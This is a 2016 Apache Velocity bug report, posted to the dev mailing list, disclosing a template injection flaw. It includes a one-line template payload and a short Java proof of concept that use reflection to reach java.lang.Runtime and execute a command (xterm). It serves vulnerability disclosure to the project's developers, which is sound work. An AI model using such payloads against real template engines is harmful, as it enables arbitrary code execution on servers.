You are viewing a plain text version of this content. The canonical link for it is here.

Posted to dev@velocity.apache.org by "Markus Wulftange (JIRA)" <ji...@apache.org> on 2016/08/15 15:26:20 UTC

[jira] [Created] (VELOCITY-877) Access to critical fields/methods allows execution of arbitrary code ('Template Injection')

Markus Wulftange created VELOCITY-877:
-----------------------------------------

             Summary: Access to critical fields/methods allows execution of arbitrary code ('Template Injection')
                 Key: VELOCITY-877
                 URL: https://issues.apache.org/jira/browse/VELOCITY-877
             Project: Velocity
          Issue Type: Bug
          Components: Engine
    Affects Versions: 1.7
            Reporter: Markus Wulftange
            Priority: Critical


It is possible to reference certain fields/methods, which eventually allow the execution of arbitrary methods.

For example, by utilizing the '{{class}}' field or '{{getClass()}}' method of any variable, it is possible to get the variable's class object. This can be extended to get arbitrary class objects and execute arbitrary methods.

For example, the following statement results in the execution of the '{{xterm}}':
{code}
$var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()
{code}

As a standalone:

{code:java}
import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.Velocity;
import org.apache.velocity.context.Context;

public class VelocityTest {

	public static void main(String[] args) {
		Context context = new VelocityContext();
		context.put("var", "foo");
		String instring = "#set($String=$var.class.class.forName('java.lang.String'))"
				+ "#set($Character=$var.class.class.forName('java.lang.Character'))"
				+ "#set($Runtime=$var.class.class.forName('java.lang.Runtime'))"
				+ "#set($proc=$Runtime.getRuntime().exec('xterm'))$proc.waitFor()";
		Velocity.evaluate(context, null, "templateName", instring);
	}

}
{code}

This issue has already been made public in the past by James Kettle in August 2015 (see http://blog.portswigger.net/2015/08/server-side-template-injection.html#Velocity) and via CVE-2015-5603 (see https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5603) and possibly others.



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@velocity.apache.org
For additional commands, e-mail: dev-help@velocity.apache.org